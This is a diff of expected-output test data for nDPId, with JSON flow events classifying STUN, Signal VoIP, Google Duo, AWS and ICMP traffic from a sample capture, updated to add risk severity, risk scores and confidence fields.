+00694{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":460,"source":"stun_signal.pcapng","alias":"nDPId-test","flow_id":13,"flow_state":"finished","flow_packets_processed":22,"flow_first_seen":1636901956930,"flow_last_seen":1636901987908,"flow_idle_time":180000,"flow_min_l4_payload_len":20,"flow_max_l4_payload_len":120,"flow_tot_l4_payload_len":1648,"flow_avg_l4_payload_len":74,"midstream":0,"ts_msec":1636902021384,"l3_proto":"ip4","src_ip":"192.168.12.169","dst_ip":"35.158.183.167","src_port":39950,"dst_port":3478,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"STUN.SignalVoip","breed":"Acceptable","category":"VoIP"}}
+00694{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":460,"source":"stun_signal.pcapng","alias":"nDPId-test","flow_id":20,"flow_state":"finished","flow_packets_processed":20,"flow_first_seen":1636901998644,"flow_last_seen":1636902021381,"flow_idle_time":180000,"flow_min_l4_payload_len":20,"flow_max_l4_payload_len":116,"flow_tot_l4_payload_len":1520,"flow_avg_l4_payload_len":76,"midstream":0,"ts_msec":1636902021384,"l3_proto":"ip4","src_ip":"192.168.12.169","dst_ip":"35.158.122.211","src_port":37970,"dst_port":3478,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"STUN.SignalVoip","breed":"Acceptable","category":"VoIP"}}
+00838{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":460,"source":"stun_signal.pcapng","alias":"nDPId-test","flow_id":9,"flow_state":"finished","flow_packets_processed":16,"flow_first_seen":1636901956899,"flow_last_seen":1636901980718,"flow_idle_time":180000,"flow_min_l4_payload_len":20,"flow_max_l4_payload_len":28,"flow_tot_l4_payload_len":384,"flow_avg_l4_payload_len":24,"midstream":0,"ts_msec":1636902021384,"l3_proto":"ip4","src_ip":"192.168.12.169","dst_ip":"35.158.183.167","src_port":43068,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"3":"DPI (cache)"},"proto":"STUN.AmazonAWS","breed":"Acceptable","category":"Cloud"}}
+00830{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":460,"source":"stun_signal.pcapng","alias":"nDPId-test","flow_id":3,"flow_state":"finished","flow_packets_processed":10,"flow_first_seen":1636901936065,"flow_last_seen":1636901939886,"flow_idle_time":180000,"flow_min_l4_payload_len":20,"flow_max_l4_payload_len":28,"flow_tot_l4_payload_len":240,"flow_avg_l4_payload_len":24,"midstream":0,"ts_msec":1636902021384,"l3_proto":"ip4","src_ip":"192.168.12.169","dst_ip":"35.158.183.167","src_port":47204,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"STUN.AmazonAWS","breed":"Acceptable","category":"Cloud"}}
+00833{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":460,"source":"stun_signal.pcapng","alias":"nDPId-test","flow_id":22,"flow_state":"finished","flow_packets_processed":6,"flow_first_seen":1636902000024,"flow_last_seen":1636902000208,"flow_idle_time":180000,"flow_min_l4_payload_len":64,"flow_max_l4_payload_len":104,"flow_tot_l4_payload_len":488,"flow_avg_l4_payload_len":81,"midstream":0,"ts_msec":1636902021384,"l3_proto":"ip4","src_ip":"192.168.12.169","dst_ip":"18.195.131.143","src_port":47767,"dst_port":54054,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"STUN.SignalVoip","breed":"Acceptable","category":"VoIP"}}
+00834{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":460,"source":"stun_signal.pcapng","alias":"nDPId-test","flow_id":10,"flow_state":"finished","flow_packets_processed":12,"flow_first_seen":1636901956900,"flow_last_seen":1636901978278,"flow_idle_time":180000,"flow_min_l4_payload_len":20,"flow_max_l4_payload_len":32,"flow_tot_l4_payload_len":312,"flow_avg_l4_payload_len":26,"midstream":0,"ts_msec":1636902021384,"l3_proto":"ip4","src_ip":"192.168.12.169","dst_ip":"172.253.121.127","src_port":43068,"dst_port":19302,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"STUN.AmazonAWS","breed":"Acceptable","category":"Cloud"}}
+00658{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":460,"source":"stun_signal.pcapng","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1636901936040,"flow_last_seen":1636901936667,"flow_idle_time":180000,"flow_min_l4_payload_len":20,"flow_max_l4_payload_len":32,"flow_tot_l4_payload_len":104,"flow_avg_l4_payload_len":26,"midstream":0,"ts_msec":1636902021384,"l3_proto":"ip4","src_ip":"192.168.12.169","dst_ip":"172.253.121.127","src_port":47204,"dst_port":19302,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"STUN.GoogleHangoutDuo","breed":"Acceptable","category":"VoIP"}}
 00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":460,"source":"stun_signal.pcapng","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1636901936040,"flow_last_seen":1636901936667,"flow_idle_time":180000,"flow_min_l4_payload_len":20,"flow_max_l4_payload_len":32,"flow_tot_l4_payload_len":104,"flow_avg_l4_payload_len":26,"midstream":0,"ts_msec":1636902021384,"l3_proto":"ip4","src_ip":"192.168.12.169","dst_ip":"172.253.121.127","src_port":47204,"dst_port":19302,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
-00719{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":460,"source":"stun_signal.pcapng","alias":"nDPId-test","flow_id":14,"flow_state":"finished","flow_packets_processed":106,"flow_first_seen":1636901958294,"flow_last_seen":1636901970409,"flow_idle_time":180000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":264,"flow_tot_l4_payload_len":7870,"flow_avg_l4_payload_len":74,"midstream":0,"ts_msec":1636902021384,"l3_proto":"ip4","src_ip":"192.168.12.169","dst_ip":"18.195.131.143","src_port":43068,"dst_port":61156,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5":"Known protocol on non standard port"},"proto":"STUN","breed":"Acceptable","category":"Network"}}
-00721{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":460,"source":"stun_signal.pcapng","alias":"nDPId-test","flow_id":6,"flow_state":"finished","flow_packets_processed":10,"flow_first_seen":1636901936070,"flow_last_seen":1636901939887,"flow_idle_time":180000,"flow_min_l4_payload_len":20,"flow_max_l4_payload_len":28,"flow_tot_l4_payload_len":240,"flow_avg_l4_payload_len":24,"midstream":0,"ts_msec":1636902021384,"l3_proto":"ip4","src_ip":"192.168.12.169","dst_ip":"35.158.183.167","src_port":39518,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5":"Known protocol on non standard port"},"proto":"STUN.SignalVoip","breed":"Acceptable","category":"VoIP"}}
-00722{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":460,"source":"stun_signal.pcapng","alias":"nDPId-test","flow_id":17,"flow_state":"finished","flow_packets_processed":14,"flow_first_seen":1636901998637,"flow_last_seen":1636902014416,"flow_idle_time":180000,"flow_min_l4_payload_len":20,"flow_max_l4_payload_len":28,"flow_tot_l4_payload_len":336,"flow_avg_l4_payload_len":24,"midstream":0,"ts_msec":1636902021384,"l3_proto":"ip4","src_ip":"192.168.12.169","dst_ip":"35.158.122.211","src_port":47767,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5":"Known protocol on non standard port"},"proto":"STUN.SignalVoip","breed":"Acceptable","category":"VoIP"}}
-00723{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":460,"source":"stun_signal.pcapng","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":1636901936040,"flow_last_seen":1636901936663,"flow_idle_time":180000,"flow_min_l4_payload_len":20,"flow_max_l4_payload_len":32,"flow_tot_l4_payload_len":104,"flow_avg_l4_payload_len":26,"midstream":0,"ts_msec":1636902021384,"l3_proto":"ip4","src_ip":"192.168.12.169","dst_ip":"172.253.121.127","src_port":39518,"dst_port":19302,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5":"Known protocol on non standard port"},"proto":"STUN.SignalVoip","breed":"Acceptable","category":"VoIP"}}
-00731{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":460,"source":"stun_signal.pcapng","alias":"nDPId-test","flow_id":15,"flow_state":"finished","flow_packets_processed":12,"flow_first_seen":1636901998588,"flow_last_seen":1636902019979,"flow_idle_time":180000,"flow_min_l4_payload_len":20,"flow_max_l4_payload_len":32,"flow_tot_l4_payload_len":312,"flow_avg_l4_payload_len":26,"midstream":0,"ts_msec":1636902021384,"l3_proto":"ip4","src_ip":"192.168.12.169","dst_ip":"172.253.121.127","src_port":47767,"dst_port":19302,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5":"Known protocol on non standard port"},"proto":"STUN.GoogleHangoutDuo","breed":"Acceptable","category":"VoIP"}}
-00722{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":460,"source":"stun_signal.pcapng","alias":"nDPId-test","flow_id":12,"flow_state":"finished","flow_packets_processed":16,"flow_first_seen":1636901956929,"flow_last_seen":1636901980724,"flow_idle_time":180000,"flow_min_l4_payload_len":20,"flow_max_l4_payload_len":28,"flow_tot_l4_payload_len":384,"flow_avg_l4_payload_len":24,"midstream":0,"ts_msec":1636902021384,"l3_proto":"ip4","src_ip":"192.168.12.169","dst_ip":"35.158.183.167","src_port":39950,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5":"Known protocol on non standard port"},"proto":"STUN.AmazonAWS","breed":"Acceptable","category":"Cloud"}}
-00667{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":460,"source":"stun_signal.pcapng","alias":"nDPId-test","flow_id":8,"flow_state":"finished","flow_packets_processed":26,"flow_first_seen":1636901956886,"flow_last_seen":1636901987907,"flow_idle_time":180000,"flow_min_l4_payload_len":20,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":2144,"flow_avg_l4_payload_len":82,"midstream":0,"ts_msec":1636902021384,"l3_proto":"ip4","src_ip":"192.168.12.169","dst_ip":"35.158.183.167","src_port":43068,"dst_port":3478,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"STUN.SignalVoip","breed":"Acceptable","category":"VoIP"}}
-00665{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":460,"source":"stun_signal.pcapng","alias":"nDPId-test","flow_id":4,"flow_state":"finished","flow_packets_processed":8,"flow_first_seen":1636901936070,"flow_last_seen":1636901940923,"flow_idle_time":180000,"flow_min_l4_payload_len":20,"flow_max_l4_payload_len":116,"flow_tot_l4_payload_len":616,"flow_avg_l4_payload_len":77,"midstream":0,"ts_msec":1636902021384,"l3_proto":"ip4","src_ip":"192.168.12.169","dst_ip":"35.158.183.167","src_port":47204,"dst_port":3478,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"STUN.SignalVoip","breed":"Acceptable","category":"VoIP"}}
-00722{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":460,"source":"stun_signal.pcapng","alias":"nDPId-test","flow_id":18,"flow_state":"finished","flow_packets_processed":14,"flow_first_seen":1636901998637,"flow_last_seen":1636902014417,"flow_idle_time":180000,"flow_min_l4_payload_len":20,"flow_max_l4_payload_len":28,"flow_tot_l4_payload_len":336,"flow_avg_l4_payload_len":24,"midstream":0,"ts_msec":1636902021384,"l3_proto":"ip4","src_ip":"192.168.12.169","dst_ip":"35.158.122.211","src_port":37970,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5":"Known protocol on non standard port"},"proto":"STUN.AmazonAWS","breed":"Acceptable","category":"Cloud"}}
-00731{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":460,"source":"stun_signal.pcapng","alias":"nDPId-test","flow_id":11,"flow_state":"finished","flow_packets_processed":12,"flow_first_seen":1636901956921,"flow_last_seen":1636901978319,"flow_idle_time":180000,"flow_min_l4_payload_len":20,"flow_max_l4_payload_len":32,"flow_tot_l4_payload_len":312,"flow_avg_l4_payload_len":26,"midstream":0,"ts_msec":1636902021384,"l3_proto":"ip4","src_ip":"192.168.12.169","dst_ip":"172.253.121.127","src_port":39950,"dst_port":19302,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5":"Known protocol on non standard port"},"proto":"STUN.GoogleHangoutDuo","breed":"Acceptable","category":"VoIP"}}
-00731{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":460,"source":"stun_signal.pcapng","alias":"nDPId-test","flow_id":16,"flow_state":"finished","flow_packets_processed":12,"flow_first_seen":1636901998589,"flow_last_seen":1636902019976,"flow_idle_time":180000,"flow_min_l4_payload_len":20,"flow_max_l4_payload_len":32,"flow_tot_l4_payload_len":312,"flow_avg_l4_payload_len":26,"midstream":0,"ts_msec":1636902021384,"l3_proto":"ip4","src_ip":"192.168.12.169","dst_ip":"172.253.121.127","src_port":37970,"dst_port":19302,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5":"Known protocol on non standard port"},"proto":"STUN.GoogleHangoutDuo","breed":"Acceptable","category":"VoIP"}}
-00727{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":460,"source":"stun_signal.pcapng","alias":"nDPId-test","flow_id":23,"flow_state":"finished","flow_packets_processed":53,"flow_first_seen":1636902000073,"flow_last_seen":1636902002742,"flow_idle_time":180000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":264,"flow_tot_l4_payload_len":6170,"flow_avg_l4_payload_len":116,"midstream":0,"ts_msec":1636902021384,"l3_proto":"ip4","src_ip":"192.168.12.169","dst_ip":"18.195.131.143","src_port":47767,"dst_port":61498,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5":"Known protocol on non standard port"},"proto":"STUN.SignalVoip","breed":"Acceptable","category":"VoIP"}}
-00638{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":460,"source":"stun_signal.pcapng","alias":"nDPId-test","flow_id":21,"flow_state":"finished","flow_packets_processed":19,"flow_first_seen":1636901998654,"flow_last_seen":1636902021384,"flow_idle_time":120000,"flow_min_l4_payload_len":56,"flow_max_l4_payload_len":104,"flow_tot_l4_payload_len":1208,"flow_avg_l4_payload_len":63,"midstream":0,"ts_msec":1636902021384,"l3_proto":"ip4","src_ip":"35.158.122.211","dst_ip":"192.168.12.169","l4_proto":"icmp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"ICMP.AmazonAWS","breed":"Acceptable","category":"Network"}}
-00637{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":460,"source":"stun_signal.pcapng","alias":"nDPId-test","flow_id":7,"flow_state":"finished","flow_packets_processed":34,"flow_first_seen":1636901936083,"flow_last_seen":1636901987911,"flow_idle_time":120000,"flow_min_l4_payload_len":56,"flow_max_l4_payload_len":104,"flow_tot_l4_payload_len":2176,"flow_avg_l4_payload_len":64,"midstream":0,"ts_msec":1636902021384,"l3_proto":"ip4","src_ip":"35.158.183.167","dst_ip":"192.168.12.169","l4_proto":"icmp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"ICMP.AmazonAWS","breed":"Acceptable","category":"Network"}}
-00665{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":460,"source":"stun_signal.pcapng","alias":"nDPId-test","flow_id":5,"flow_state":"finished","flow_packets_processed":8,"flow_first_seen":1636901936070,"flow_last_seen":1636901940923,"flow_idle_time":180000,"flow_min_l4_payload_len":20,"flow_max_l4_payload_len":116,"flow_tot_l4_payload_len":616,"flow_avg_l4_payload_len":77,"midstream":0,"ts_msec":1636902021384,"l3_proto":"ip4","src_ip":"192.168.12.169","dst_ip":"35.158.183.167","src_port":39518,"dst_port":3478,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"STUN.SignalVoip","breed":"Acceptable","category":"VoIP"}}
-00668{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":460,"source":"stun_signal.pcapng","alias":"nDPId-test","flow_id":19,"flow_state":"finished","flow_packets_processed":22,"flow_first_seen":1636901998644,"flow_last_seen":1636902021381,"flow_idle_time":180000,"flow_min_l4_payload_len":20,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":1768,"flow_avg_l4_payload_len":80,"midstream":0,"ts_msec":1636902021384,"l3_proto":"ip4","src_ip":"192.168.12.169","dst_ip":"35.158.122.211","src_port":47767,"dst_port":3478,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"STUN.SignalVoip","breed":"Acceptable","category":"VoIP"}}
+00836{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":460,"source":"stun_signal.pcapng","alias":"nDPId-test","flow_id":14,"flow_state":"finished","flow_packets_processed":106,"flow_first_seen":1636901958294,"flow_last_seen":1636901970409,"flow_idle_time":180000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":264,"flow_tot_l4_payload_len":7870,"flow_avg_l4_payload_len":74,"midstream":0,"ts_msec":1636902021384,"l3_proto":"ip4","src_ip":"192.168.12.169","dst_ip":"18.195.131.143","src_port":43068,"dst_port":61156,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"STUN.AmazonAWS","breed":"Acceptable","category":"Cloud"}}
+00830{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":460,"source":"stun_signal.pcapng","alias":"nDPId-test","flow_id":6,"flow_state":"finished","flow_packets_processed":10,"flow_first_seen":1636901936070,"flow_last_seen":1636901939887,"flow_idle_time":180000,"flow_min_l4_payload_len":20,"flow_max_l4_payload_len":28,"flow_tot_l4_payload_len":240,"flow_avg_l4_payload_len":24,"midstream":0,"ts_msec":1636902021384,"l3_proto":"ip4","src_ip":"192.168.12.169","dst_ip":"35.158.183.167","src_port":39518,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"STUN.SignalVoip","breed":"Acceptable","category":"VoIP"}}
+00831{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":460,"source":"stun_signal.pcapng","alias":"nDPId-test","flow_id":17,"flow_state":"finished","flow_packets_processed":14,"flow_first_seen":1636901998637,"flow_last_seen":1636902014416,"flow_idle_time":180000,"flow_min_l4_payload_len":20,"flow_max_l4_payload_len":28,"flow_tot_l4_payload_len":336,"flow_avg_l4_payload_len":24,"midstream":0,"ts_msec":1636902021384,"l3_proto":"ip4","src_ip":"192.168.12.169","dst_ip":"35.158.122.211","src_port":47767,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"STUN.SignalVoip","breed":"Acceptable","category":"VoIP"}}
+00832{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":460,"source":"stun_signal.pcapng","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":1636901936040,"flow_last_seen":1636901936663,"flow_idle_time":180000,"flow_min_l4_payload_len":20,"flow_max_l4_payload_len":32,"flow_tot_l4_payload_len":104,"flow_avg_l4_payload_len":26,"midstream":0,"ts_msec":1636902021384,"l3_proto":"ip4","src_ip":"192.168.12.169","dst_ip":"172.253.121.127","src_port":39518,"dst_port":19302,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"STUN.SignalVoip","breed":"Acceptable","category":"VoIP"}}
+00840{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":460,"source":"stun_signal.pcapng","alias":"nDPId-test","flow_id":15,"flow_state":"finished","flow_packets_processed":12,"flow_first_seen":1636901998588,"flow_last_seen":1636902019979,"flow_idle_time":180000,"flow_min_l4_payload_len":20,"flow_max_l4_payload_len":32,"flow_tot_l4_payload_len":312,"flow_avg_l4_payload_len":26,"midstream":0,"ts_msec":1636902021384,"l3_proto":"ip4","src_ip":"192.168.12.169","dst_ip":"172.253.121.127","src_port":47767,"dst_port":19302,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"STUN.GoogleHangoutDuo","breed":"Acceptable","category":"VoIP"}}
+00839{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":460,"source":"stun_signal.pcapng","alias":"nDPId-test","flow_id":12,"flow_state":"finished","flow_packets_processed":16,"flow_first_seen":1636901956929,"flow_last_seen":1636901980724,"flow_idle_time":180000,"flow_min_l4_payload_len":20,"flow_max_l4_payload_len":28,"flow_tot_l4_payload_len":384,"flow_avg_l4_payload_len":24,"midstream":0,"ts_msec":1636902021384,"l3_proto":"ip4","src_ip":"192.168.12.169","dst_ip":"35.158.183.167","src_port":39950,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"3":"DPI (cache)"},"proto":"STUN.AmazonAWS","breed":"Acceptable","category":"Cloud"}}
+00693{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":460,"source":"stun_signal.pcapng","alias":"nDPId-test","flow_id":8,"flow_state":"finished","flow_packets_processed":26,"flow_first_seen":1636901956886,"flow_last_seen":1636901987907,"flow_idle_time":180000,"flow_min_l4_payload_len":20,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":2144,"flow_avg_l4_payload_len":82,"midstream":0,"ts_msec":1636902021384,"l3_proto":"ip4","src_ip":"192.168.12.169","dst_ip":"35.158.183.167","src_port":43068,"dst_port":3478,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"STUN.SignalVoip","breed":"Acceptable","category":"VoIP"}}
+00691{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":460,"source":"stun_signal.pcapng","alias":"nDPId-test","flow_id":4,"flow_state":"finished","flow_packets_processed":8,"flow_first_seen":1636901936070,"flow_last_seen":1636901940923,"flow_idle_time":180000,"flow_min_l4_payload_len":20,"flow_max_l4_payload_len":116,"flow_tot_l4_payload_len":616,"flow_avg_l4_payload_len":77,"midstream":0,"ts_msec":1636902021384,"l3_proto":"ip4","src_ip":"192.168.12.169","dst_ip":"35.158.183.167","src_port":47204,"dst_port":3478,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"STUN.SignalVoip","breed":"Acceptable","category":"VoIP"}}
+00831{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":460,"source":"stun_signal.pcapng","alias":"nDPId-test","flow_id":18,"flow_state":"finished","flow_packets_processed":14,"flow_first_seen":1636901998637,"flow_last_seen":1636902014417,"flow_idle_time":180000,"flow_min_l4_payload_len":20,"flow_max_l4_payload_len":28,"flow_tot_l4_payload_len":336,"flow_avg_l4_payload_len":24,"midstream":0,"ts_msec":1636902021384,"l3_proto":"ip4","src_ip":"192.168.12.169","dst_ip":"35.158.122.211","src_port":37970,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"STUN.AmazonAWS","breed":"Acceptable","category":"Cloud"}}
+00840{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":460,"source":"stun_signal.pcapng","alias":"nDPId-test","flow_id":11,"flow_state":"finished","flow_packets_processed":12,"flow_first_seen":1636901956921,"flow_last_seen":1636901978319,"flow_idle_time":180000,"flow_min_l4_payload_len":20,"flow_max_l4_payload_len":32,"flow_tot_l4_payload_len":312,"flow_avg_l4_payload_len":26,"midstream":0,"ts_msec":1636902021384,"l3_proto":"ip4","src_ip":"192.168.12.169","dst_ip":"172.253.121.127","src_port":39950,"dst_port":19302,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"STUN.GoogleHangoutDuo","breed":"Acceptable","category":"VoIP"}}
+00840{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":460,"source":"stun_signal.pcapng","alias":"nDPId-test","flow_id":16,"flow_state":"finished","flow_packets_processed":12,"flow_first_seen":1636901998589,"flow_last_seen":1636902019976,"flow_idle_time":180000,"flow_min_l4_payload_len":20,"flow_max_l4_payload_len":32,"flow_tot_l4_payload_len":312,"flow_avg_l4_payload_len":26,"midstream":0,"ts_msec":1636902021384,"l3_proto":"ip4","src_ip":"192.168.12.169","dst_ip":"172.253.121.127","src_port":37970,"dst_port":19302,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"STUN.GoogleHangoutDuo","breed":"Acceptable","category":"VoIP"}}
+00836{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":460,"source":"stun_signal.pcapng","alias":"nDPId-test","flow_id":23,"flow_state":"finished","flow_packets_processed":53,"flow_first_seen":1636902000073,"flow_last_seen":1636902002742,"flow_idle_time":180000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":264,"flow_tot_l4_payload_len":6170,"flow_avg_l4_payload_len":116,"midstream":0,"ts_msec":1636902021384,"l3_proto":"ip4","src_ip":"192.168.12.169","dst_ip":"18.195.131.143","src_port":47767,"dst_port":61498,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"STUN.SignalVoip","breed":"Acceptable","category":"VoIP"}}
+00654{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":460,"source":"stun_signal.pcapng","alias":"nDPId-test","flow_id":21,"flow_state":"finished","flow_packets_processed":19,"flow_first_seen":1636901998654,"flow_last_seen":1636902021384,"flow_idle_time":120000,"flow_min_l4_payload_len":56,"flow_max_l4_payload_len":104,"flow_tot_l4_payload_len":1208,"flow_avg_l4_payload_len":63,"midstream":0,"ts_msec":1636902021384,"l3_proto":"ip4","src_ip":"35.158.122.211","dst_ip":"192.168.12.169","l4_proto":"icmp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"ICMP","breed":"Acceptable","category":"Network"}}
+00653{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":460,"source":"stun_signal.pcapng","alias":"nDPId-test","flow_id":7,"flow_state":"finished","flow_packets_processed":34,"flow_first_seen":1636901936083,"flow_last_seen":1636901987911,"flow_idle_time":120000,"flow_min_l4_payload_len":56,"flow_max_l4_payload_len":104,"flow_tot_l4_payload_len":2176,"flow_avg_l4_payload_len":64,"midstream":0,"ts_msec":1636902021384,"l3_proto":"ip4","src_ip":"35.158.183.167","dst_ip":"192.168.12.169","l4_proto":"icmp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"ICMP","breed":"Acceptable","category":"Network"}}
